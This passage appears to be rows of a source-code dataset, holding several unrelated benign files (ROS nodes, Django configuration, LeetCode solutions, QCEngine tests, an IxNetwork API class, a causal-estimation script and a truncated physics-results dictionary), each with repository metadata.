def set_SrcDBInstanceId(self,SrcDBInstanceId):
self.add_query_param('SrcDBInstanceId',SrcDBInstanceId)
def get_MasterInstanceType(self):
return self.get_query_params().get('MasterInstanceType')
def set_MasterInstanceType(self,MasterInstanceType):
self.add_query_param('MasterInstanceType',MasterInstanceType)
def get_ColdStorageSize(self):
return self.get_query_params().get('ColdStorageSize')
def set_ColdStorageSize(self,ColdStorageSize):
self.add_query_param('ColdStorageSize',ColdStorageSize)
def get_CoreDiskQuantity(self):
return self.get_query_params().get('CoreDiskQuantity')
def set_CoreDiskQuantity(self,CoreDiskQuantity):
self.add_query_param('CoreDiskQuantity',CoreDiskQuantity)
def get_IsColdStorage(self):
return self.get_query_params().get('IsColdStorage')
def set_IsColdStorage(self,IsColdStorage):
self.add_query_param('IsColdStorage',IsColdStorage)
def get_CoreInstanceType(self):
return self.get_query_params().get('CoreInstanceType')
def set_CoreInstanceType(self,CoreInstanceType):
self.add_query_param('CoreInstanceType',CoreInstanceType)
def get_CoreDiskSize(self):
return self.get_query_params().get('CoreDiskSize')
def set_CoreDiskSize(self,CoreDiskSize):
self.add_query_param('CoreDiskSize',CoreDiskSize)
def get_VpcId(self):
return self.get_query_params().get('VpcId')
def set_VpcId(self,VpcId):
self.add_query_param('VpcId',VpcId)
def get_DbType(self):
return self.get_query_params().get('DbType')
def set_DbType(self,DbType):
self.add_query_param('DbType',DbType)
def get_PayType(self):
return self.get_query_params().get('PayType')
def set_PayType(self,PayType):
self.add_query_param('PayType',PayType) | [
"[email protected]"
] | |
afd5e9a732ae36b23155af1e2cba98c435520645 | dde6faa0857c8c7e46cbe3c48dbe80b1ac9c9bcf | /suspend_resume/scripts/suspend_resume_handler_3.py | 18f59181cb17badae55a3e34d125fbf2cc356724 | [] | no_license | ROSDevoloper/Atlas80EVO-Gazebo | 7119270f4421b1a077e3c4abbb90dcf11281023b | 468d068584e71c3cca2169b365ec43faaac33f47 | refs/heads/master | 2022-10-16T10:02:48.121404 | 2020-06-15T05:08:46 | 2020-06-15T05:08:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,185 | py | #!/usr/bin/env python
"""
Author: (1) Arefeen Ridwan
(2) Samuel Chieng Kien Ho
Function: Suspend Resume based on service request
"""
import rospy
from atlas80evo_msgs.msg import FSMState
from atlas80evo_msgs.srv import SetFSMState
from std_srvs.srv import Empty
from geometry_msgs.msg import Twist
from std_msgs.msg import String
class SuspendResumeHandler():
def __init__(self):
# Internal USE Variables - Modify with consultation
self.rate = rospy.Rate(30)
self.sleep = rospy.Rate(2)
self.pre_state="NONE"
self.current_state="NONE"
# Publisher
self.drive_pub = rospy.Publisher(rospy.get_param("~drive_topic", "/twist_cmd_mux/input/suspend"), Twist, queue_size=1)
# Subscriber
self.state_sub= rospy.Subscriber("/fsm_node/state", FSMState, self.stateCB, queue_size=1) #get current state from ros
# Service Server
self.suspend_srv = rospy.Service("/suspend/request", Empty, self.suspendSRV)
# Service Client
self.set_state_call = rospy.ServiceProxy("/fsm_node/set_state", SetFSMState)
# Main Loop
self.main_loop()
# FSM State Callback
def stateCB(self, msg):
self.current_state = msg.state
if str(msg.state)!="SUSPEND" and str(msg.state)!="ERROR" and str(msg.state)!="MANUAL":
self.pre_state=str(msg.state)
def suspendSRV(self, req):
self.sleep.sleep()
if self.current_state!="SUSPEND":
self.set_state_call("SUSPEND")
self.stopping()
#print("suspend")
else:
self.set_state_call(self.pre_state)
print self.pre_state
self.sleep.sleep()
return ()
# Main Loop
def main_loop(self):
while not rospy.is_shutdown():
if(self.current_state=="SUSPEND"):
self.stopping()
#print("suspend")
self.rate.sleep()
# Stopping Vehicle
def stopping(self):
stop_cmd=Twist()
self.drive_pub.publish(stop_cmd)
if __name__=="__main__":
rospy.init_node("suspend_resume_handler")
SuspendResumeHandler()
rospy.spin()
| [
"[email protected]"
] | |
f64feda20504dccac97a40d5747a0a3c49125432 | d05298a88638fd62f74e8f26c5a1959f821367d1 | /src/words_baseline/reddit_output_att.py | 413266f01e93721f50de7639a7e50fc75bac1c43 | [
"MIT"
] | permissive | rpryzant/causal-text-embeddings | d4b93f5852f1854d52a09e28b81ee784015e296a | 2966493f86a6f808f0dfa71d590e3403a840befc | refs/heads/master | 2022-12-22T09:33:23.654291 | 2020-03-05T19:41:33 | 2020-03-05T19:41:33 | 298,045,006 | 1 | 0 | MIT | 2020-09-23T17:28:18 | 2020-09-23T17:28:18 | null | UTF-8 | Python | false | false | 4,087 | py | from semi_parametric_estimation.att import att_estimates, psi_plugin, psi_q_only
from reddit.data_cleaning.reddit_posts import load_reddit_processed
from .helpers import filter_document_embeddings, make_index_mapping, assign_split
import numpy as np
import pandas as pd
import os
from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge
from sklearn.metrics import mean_squared_error as mse
import argparse
import sys
from scipy.special import logit
from scipy.sparse import load_npz
def get_log_outcomes(outcomes):
#relu
outcomes = np.array([max(0.0, out) + 1.0 for out in outcomes])
return np.log(outcomes)
def predict_expected_outcomes(model, features):
return model.predict(features)
def fit_conditional_expected_outcomes(outcomes, features):
model = Ridge()
model.fit(features, outcomes)
predict = model.predict(features)
if verbose:
print("Training MSE:", mse(outcomes, predict))
return model
def predict_treatment_probability(labels, features):
model = LogisticRegression(solver='liblinear')
model.fit(features, labels)
if verbose:
print("Training accuracy:", model.score(features, labels))
treatment_probability = model.predict_proba(features)[:,1]
return treatment_probability
def load_simulated_data():
sim_df = pd.read_csv(simulation_file, delimiter='\t')
sim_df = sim_df.rename(columns={'index':'post_index'})
return sim_df
def load_term_counts(path='../dat/reddit/'):
return load_npz(path + 'term_counts.npz').toarray()
def main():
if not dat_dir:
term_counts = load_term_counts()
else:
term_counts = load_term_counts(path=dat_dir)
sim_df = load_simulated_data()
treatment_labels = sim_df.treatment.values
indices = sim_df.post_index.values
all_words = term_counts[indices, :]
treated_sim = sim_df[sim_df.treatment==1]
untreated_sim = sim_df[sim_df.treatment==0]
treated_indices = treated_sim.post_index.values
untreated_indices = untreated_sim.post_index.values
all_outcomes = sim_df.outcome.values
outcomes_st_treated = treated_sim.outcome.values
outcomes_st_not_treated = untreated_sim.outcome.values
words_st_treated = term_counts[treated_indices,:]
words_st_not_treated = term_counts[untreated_indices,:]
treatment_probability = predict_treatment_probability(treatment_labels, all_words)
model_outcome_st_treated = fit_conditional_expected_outcomes(outcomes_st_treated, words_st_treated)
model_outcome_st_not_treated = fit_conditional_expected_outcomes(outcomes_st_not_treated, words_st_not_treated)
expected_outcome_st_treated = predict_expected_outcomes(model_outcome_st_treated, all_words)
expected_outcome_st_not_treated = predict_expected_outcomes(model_outcome_st_not_treated, all_words)
q_hat = psi_q_only(expected_outcome_st_not_treated, expected_outcome_st_treated,
treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
tmle = psi_plugin(expected_outcome_st_not_treated, expected_outcome_st_treated,
treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
print("Q hat:", q_hat)
print("TMLE:", tmle)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--dat-dir", action="store", default=None)
parser.add_argument("--sim-dir", action="store", default='../dat/sim/reddit_subreddit_based/')
parser.add_argument("--subs", action="store", default='13,6,8')
parser.add_argument("--mode", action="store", default="simple")
parser.add_argument("--params", action="store", default="1.0,1.0,1.0")
parser.add_argument("--verbose", action='store_true')
args = parser.parse_args()
sim_dir = args.sim_dir
dat_dir = args.dat_dir
subs = None
if args.subs != '':
subs = [int(s) for s in args.subs.split(',')]
verbose = args.verbose
params = args.params.split(',')
sim_setting = 'beta0' + params[0] + '.beta1' + params[1] + '.gamma' + params[2]
subs_string = ', '.join(args.subs.split(','))
mode = args.mode
simulation_file = sim_dir + 'subreddits['+ subs_string + ']/mode' + mode + '/' + sim_setting + ".tsv"
main() | [
"[email protected]"
] | |
bf3628287d6912c3ae78c55e67f21dd80313b222 | b95e71dcc1b42ebf3459ee57bd0119c618a79796 | /Array/maximum_subarray.py | 562be03611c865ee216e753a51da805015ca258d | [] | no_license | anton-dovnar/LeetCode | e47eece7de28d76b0c3b997d4dacb4f151a839b5 | 6ed9e1bd4a0b48e343e1dd8adaebac26a3bc2ed7 | refs/heads/master | 2023-06-29T07:21:06.335041 | 2021-07-31T15:08:05 | 2021-07-31T15:08:05 | 361,205,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | class Solution:
def maxSubArray(self, nums: List[int]) -> int:
max_subarr = float('-inf')
curr_sum = 0
for n in nums:
curr_sum = max(n, curr_sum + n)
max_subarr = max(max_subarr, curr_sum)
return max_subarr
| [
"[email protected]"
] | |
96302dbfad171e64160534464df2b0add5495106 | 59e613d6a0bcb8570c89defa77da398f69b82c77 | /qcengine/tests/test_config.py | 40178a4cfe0e32b0d39d4a31efe3c27904365901 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | ffangliu/QCEngine | 3e081e7f5e236c434016e222f716e6b34b24030b | 835b291986069669e4be0e708ec4846ebfd858d6 | refs/heads/master | 2020-04-22T23:57:35.470503 | 2019-02-14T16:57:30 | 2019-02-14T16:57:30 | 170,760,404 | 0 | 0 | null | 2019-02-14T21:27:14 | 2019-02-14T21:27:14 | null | UTF-8 | Python | false | false | 5,049 | py | """
Tests the DQM compute module configuration
"""
import copy
import os
import pydantic
import pytest
import qcengine
from qcengine.testing import environ_context
def test_node_blank():
node = qcengine.config.NodeDescriptor(name="something", hostname_pattern="*")
def test_node_auto():
desc = {
"name": "something",
"hostname_pattern": "*",
"jobs_per_node": 1,
"ncores": 4,
"memory": 10,
"memory_safety_factor": 0,
}
node1 = qcengine.config.NodeDescriptor(**desc)
job1 = qcengine.get_config(hostname=node1)
assert job1.ncores == 4
assert pytest.approx(job1.memory) == 10.0
desc["jobs_per_node"] = 2
node2 = qcengine.config.NodeDescriptor(**desc)
job2 = qcengine.get_config(hostname=node2)
assert job2.ncores == 2
assert pytest.approx(job2.memory) == 5.0
def test_node_environ():
scratch_name = "myscratch1234"
with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
description = {
"name": "something",
"hostname_pattern": "*",
"scratch_directory": "$QCA_SCRATCH_DIR",
}
node = qcengine.config.NodeDescriptor(**description)
assert node.scratch_directory == scratch_name
def test_node_skip_environ():
description = {
"name": "something",
"hostname_pattern": "*",
"scratch_directory": "$RANDOM_ENVIRON",
}
node = qcengine.config.NodeDescriptor(**description)
assert node.scratch_directory is None
@pytest.fixture
def opt_state_basic():
"""
Capture the options state and temporarily override.
"""
# Snapshot env
old_node = copy.deepcopy(qcengine.config.NODE_DESCRIPTORS)
scratch_name = "myscratch1234"
with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
configs = [{
"name": "dragonstooth",
"hostname_pattern": "dt*",
"jobs_per_node": 2,
"ncores": 12,
"memory": 120,
"scratch_directory": "$NOVAR_RANDOM_ABC123"
}, {
"name": "newriver",
"hostname_pattern": "nr*",
"jobs_per_node": 2,
"ncores": 24,
"memory": 240
},
{
"name": "default",
"hostname_pattern": "*",
"jobs_per_node": 1,
"memory": 4,
"memory_safety_factor": 0,
"ncores": 5,
"scratch_directory": "$QCA_SCRATCH_DIR"
}]
for desc in configs:
node = qcengine.config.NodeDescriptor(**desc)
qcengine.config.NODE_DESCRIPTORS[desc["name"]] = node
yield
# Reset env
qcengine.config.NODE_DESCRIPTORS = old_node
def test_node_matching(opt_state_basic):
node = qcengine.config.get_node_descriptor("nomatching")
assert node.name == "default"
node = qcengine.config.get_node_descriptor("dt149")
assert node.name == "dragonstooth"
node = qcengine.config.get_node_descriptor("nr149")
assert node.name == "newriver"
def test_node_env(opt_state_basic):
node = qcengine.config.get_node_descriptor("dt")
assert node.name == "dragonstooth"
assert node.scratch_directory is None
node = qcengine.config.get_node_descriptor("nomatching")
assert node.name == "default"
assert node.scratch_directory == "myscratch1234"
def test_config_default(opt_state_basic):
config = qcengine.config.get_config(hostname="something")
assert config.ncores == 5
assert config.memory == 4
config = qcengine.config.get_config(hostname="dt149")
assert config.ncores == 6
assert pytest.approx(config.memory, 0.1) == 54
def test_config_local_ncores(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"ncores": 10})
assert config.ncores == 10
assert config.memory == 4
def test_config_local_njobs(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 5})
assert config.ncores == 1
assert pytest.approx(config.memory) == 0.8
def test_config_local_njob_ncore(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 3, "ncores": 1})
assert config.ncores == 1
assert pytest.approx(config.memory, 0.1) == 1.33
def test_config_local_njob_ncore(opt_state_basic):
config = qcengine.config.get_config(
hostname="something", local_options={
"jobs_per_node": 3,
"ncores": 1,
"memory": 6
})
assert config.ncores == 1
assert pytest.approx(config.memory, 0.1) == 6
def test_config_validation(opt_state_basic):
with pytest.raises(pydantic.ValidationError):
config = qcengine.config.get_config(hostname="something", local_options={"bad": 10})
def test_global_repr():
assert isinstance(qcengine.config.global_repr(), str)
| [
"[email protected]"
] | |
25bb1e59fa52a1478f01a27db44ee8ae299b07d2 | 81407be1385564308db7193634a2bb050b4f822e | /the-python-standard-library-by-example/subprocess/repeater.py | cf01ca41051f6970c677e34642d0326924274e24 | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 1,421 | py | #!/usr/bin/env python
#
# Copyright 2007 Doug Hellmann.
#
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Doug
# Hellmann not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# DOUG HELLMANN DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL DOUG HELLMANN BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""Echo anything written to stdin on stdout.
"""
__module_id__ = "$Id$"
#end_pymotw_header
import sys
sys.stderr.write('repeater.py: starting\n')
sys.stderr.flush()
while True:
next_line = sys.stdin.readline()
if not next_line:
break
sys.stdout.write(next_line)
sys.stdout.flush()
sys.stderr.write('repeater.py: exiting\n')
sys.stderr.flush()
| [
"[email protected]"
] | |
3f78c466709124429eaedfcbc4849133d80eb1be | 4c4509c34b57350b605af50600eefc0c24a74255 | /ecommerce/urls.py | 0dead703ab3eb8c660305689032883b343a6f140 | [] | no_license | sayanth123/ecomm | cd6dd7e8c3fb13048d35c272379a320c20eb3d24 | 67101ebbb08c82bbd15a7c1dfc22c3da5483e307 | refs/heads/main | 2023-05-05T03:20:16.660301 | 2021-05-27T04:21:44 | 2021-05-27T04:21:44 | 370,259,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py | """ecommerce URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from ecommerce import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('ecommerce_app/', include('ecommerceapp.urls')),
path('search_app/', include('search_app.urls')),
path('cart/', include('cart_app.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL,
document_root= settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
#search_app/
#ecommerce_app/ | [
"[email protected]"
] | |
9170b0b21899081c2505bb3e82a8d26b4391d673 | d650da884a0a33dd1acf17d04f56d6d22a2287fd | /test/test_inspect.py | 894d8f97bc3c3456e7baeaaca34461ea1c6b61a8 | [] | no_license | GaelicGrime/rpnpy | debe3a79e9a456e13dcd1421d42f01c0bcbe9084 | 5a095dd024403daad93a3222bd190bbb867a8ae2 | refs/heads/master | 2023-04-03T11:19:16.737278 | 2020-12-03T08:26:40 | 2020-12-03T08:26:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | from unittest import TestCase
from math import log
from rpnpy.inspect import countArgs
class TestCountArgs(TestCase):
"""Test the countArgs function"""
def testZero(self):
"A function that takes zero arguments must be processed correctly"
self.assertEqual(0, countArgs(lambda: 3))
def testOne(self):
"A function that takes one argument must be processed correctly"
self.assertEqual(1, countArgs(lambda x: 3))
def testTwo(self):
"A function that takes two arguments must be processed correctly"
self.assertEqual(2, countArgs(lambda x, y: 3))
def testLog(self):
"The signature of math.log can't be inspected (at least in Python 3.7)"
self.assertEqual(None, countArgs(log))
def testLogWithDefault(self):
"""The signature of math.log can't be inspected (at least in Python
3.7). Pass a default value."""
self.assertEqual(3, countArgs(log, 3))
| [
"[email protected]"
] | |
d09e8cfd12158d7338f73096900aa2f29faece0c | 09cead98874a64d55b9e5c84b369d3523c890442 | /py210110c_python1a/day06_210214/homework/hw_5_yiding.py | 2b8e12eb578a330374112c74a1059c59eddd995b | [] | no_license | edu-athensoft/stem1401python_student | f12b404d749286036a090e941c0268381ce558f8 | baad017d4cef2994855b008a756758d7b5e119ec | refs/heads/master | 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | """
1,1
2,1
3,1
4,0
5,0
6,1
7,0.5
8,1
"""
"""
q1.
none, false, else if, for, in, from, as
q2.
abc$, 0a
q3.
a
q4.
c
q5.
a
q6.
a
q7.
a
q8.
a
""" | [
"[email protected]"
] | |
7a6ea156514e8fec2c46d6640f4d2fd9b8b57b5d | 80b7f2a10506f70477d8720e229d7530da2eff5d | /ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/statistics/misdirectedperflow/misdirectedperflow.py | 0562872acb73fb50d2a0e5450f633d42c7da8502 | [
"MIT"
] | permissive | OpenIxia/ixnetwork_restpy | 00fdc305901aa7e4b26e4000b133655e2d0e346a | c8ecc779421bffbc27c906c1ea51af3756d83398 | refs/heads/master | 2023-08-10T02:21:38.207252 | 2023-07-19T14:14:57 | 2023-07-19T14:14:57 | 174,170,555 | 26 | 16 | MIT | 2023-02-02T07:02:43 | 2019-03-06T15:27:20 | Python | UTF-8 | Python | false | false | 4,342 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class MisdirectedPerFlow(Base):
"""Display misdirected statistics on a per-flow basis. When active this replaces port level misdirected statistics
The MisdirectedPerFlow class encapsulates a required misdirectedPerFlow resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = "misdirectedPerFlow"
_SDM_ATT_MAP = {
"Enabled": "enabled",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
super(MisdirectedPerFlow, self).__init__(parent, list_op)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: If true then misdirected per flow statistics will be enabled
"""
return self._get_attribute(self._SDM_ATT_MAP["Enabled"])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["Enabled"], value)
def update(self, Enabled=None):
# type: (bool) -> MisdirectedPerFlow
"""Updates misdirectedPerFlow resource on the server.
Args
----
- Enabled (bool): If true then misdirected per flow statistics will be enabled
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Enabled=None):
# type: (bool) -> MisdirectedPerFlow
"""Finds and retrieves misdirectedPerFlow resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve misdirectedPerFlow resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all misdirectedPerFlow resources from the server.
Args
----
- Enabled (bool): If true then misdirected per flow statistics will be enabled
Returns
-------
- self: This instance with matching misdirectedPerFlow resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of misdirectedPerFlow data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the misdirectedPerFlow resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| [
"[email protected]"
] | |
33f2f552754a26206f2b192b5ce5639d80bcdbf5 | 5efc0271eb922da63a6825112b4de786915b1b89 | /22_qpdf简化使用/test.py | def4e13a983537dc89696317c9b91c7f06cd114e | [] | no_license | uestcmee/PiecemealScripts | 41e7d45cbcd5d720822da6cbc935efd2ce0fcee4 | a18b4dd58229897aafe53767448e3fd8fb9c1881 | refs/heads/master | 2021-04-21T16:04:04.006230 | 2021-01-07T06:47:45 | 2021-01-07T06:47:45 | 249,794,695 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | import re
files='{D:/Desktop/Geryler Karadi 2015.pdf} D:/Desktop/光伏产业\链.png'
files.replace('\\','/')
print(files) | [
"[email protected]"
] | |
006123581571814076c0c5a650ae638e95c97553 | 6fe2d3c27c4cb498b7ad6d9411cc8fa69f4a38f8 | /algorithms/algorithms-python/leetcode/Question_010_Regular_Expression_Matching.py | 68ae34c4b6feaa6b7adadbf0450d28621463d895 | [] | no_license | Lanceolata/code | aae54af632a212c878ce45b11dab919bba55bcb3 | f7d5a7de27c3cc8a7a4abf63eab9ff9b21d512fb | refs/heads/master | 2022-09-01T04:26:56.190829 | 2021-07-29T05:14:40 | 2021-07-29T05:14:40 | 87,202,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | #!/usr/bin/python
# coding: utf-8
class Solution(object):
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
if not p:
return not s
m, n = len(s), len(p)
dp = [[False] * (n + 1) for i in range(m + 1)]
dp[m][n] = True
for i in range(m, -1, -1):
for j in range(n - 1, -1, -1):
match = i < m and (s[i] == p[j] or p[j] == '.')
if j + 1 < n and p[j + 1] == '*':
dp[i][j] = dp[i][j + 2] or (match and dp[i + 1][j])
else:
dp[i][j] = match and dp[i + 1][j + 1]
return dp[0][0]
| [
"[email protected]"
] | |
72c49aa9bbe684e1346f0668477ce89c841a9b0a | 74192ed5b9b5529c7b6ab9f238e9f44d5dce6aca | /backend/manage.py | abefc5fc0c9913675279a1ecc7a3677e5d3465ed | [] | no_license | crowdbotics-apps/black-mart-23466 | 47691415229f97248b7aaf18c6efca45f81d6e84 | 5be279d61e74cc543782b8879ca4d7abeb3ad06c | refs/heads/master | 2023-02-03T22:51:54.843742 | 2020-12-24T19:41:41 | 2020-12-24T19:41:41 | 322,783,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "black_mart_23466.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
342d7838454b684e37cb8847a8e2eb7083a265e8 | bae75bf1de75fb1b76e19b0d32c778e566de570a | /smodels/test/testFiles/scanExample/smodels-output/100488230.slha.py | 61b10a9b406b2f585c269025d1c544acdcb3f737 | [] | no_license | andlessa/RDM | 78ae5cbadda1875c24e1bb726096b05c61627249 | ac6b242871894fee492e089d378806c2c2e7aad8 | refs/heads/master | 2023-08-16T00:47:14.415434 | 2021-09-21T20:54:25 | 2021-09-21T20:54:25 | 228,639,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,108 | py | smodelsOutput = {'ExptRes': [{'AnalysisSqrts (TeV)': 8, 'chi2': -0.01262596850888705, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.242, 'likelihood': 0.24134326901519393, 'AnalysisID': 'ATLAS-CONF-2013-093', 'upper limit (fb)': 0.21, 'theory prediction (fb)': 1.9895558829990775e-05, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'SRBh'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.080725933861111418, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.517, 'likelihood': 0.080915004649873834, 'AnalysisID': 'ATLAS-CONF-2013-053', 'upper limit (fb)': 0.45, 'theory prediction (fb)': 4.641807353583199e-05, 'lumi (fb-1)': 20.1, 'TxNames': ['T2tt'], 'DataSetID': 'SRA mCT250'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 1.3268179470754997, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.235, 'likelihood': 0.082051203901957165, 'AnalysisID': 'ATLAS-CONF-2013-062', 'upper limit (fb)': 0.38, 'theory prediction (fb)': 0.00014170357283113728, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'incHL3j_m'}, {'AnalysisSqrts (TeV)': 8.0, 'chi2': 0.18071342418780731, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 1.23, 'likelihood': 0.030109490456771158, 'AnalysisID': 'ATLAS-SUSY-2013-04', 'upper limit (fb)': 1.04, 'theory prediction (fb)': 0.00015365831214172594, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'GtGrid_SR_8ej50_2ibjet'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.11881841528273665, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.292, 'likelihood': 0.19205573525299049, 'AnalysisID': 'ATLAS-CONF-2013-061', 'upper limit (fb)': 0.23, 'theory prediction (fb)': 0.00016085993231827376, 'lumi (fb-1)': 20.1, 'TxNames': ['T2tt'], 'DataSetID': 'SR-0l-4j-A'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.15264247723847224, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.303, 'likelihood': 0.16330613782184344, 'AnalysisID': 'ATLAS-CONF-2013-048', 'upper limit (fb)': 0.23, 'theory prediction (fb)': 0.00016367804967709967, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'SR M120'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.51517066264090305, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.35, 'likelihood': 0.090423569611299118, 'AnalysisID': 'ATLAS-CONF-2013-037', 'upper limit (fb)': 0.4, 'theory prediction (fb)': 0.0006599393876471776, 'lumi (fb-1)': 20.7, 'TxNames': ['T2tt'], 'DataSetID': 'SRtN3'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.7460827902608741, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 0.239, 'likelihood': 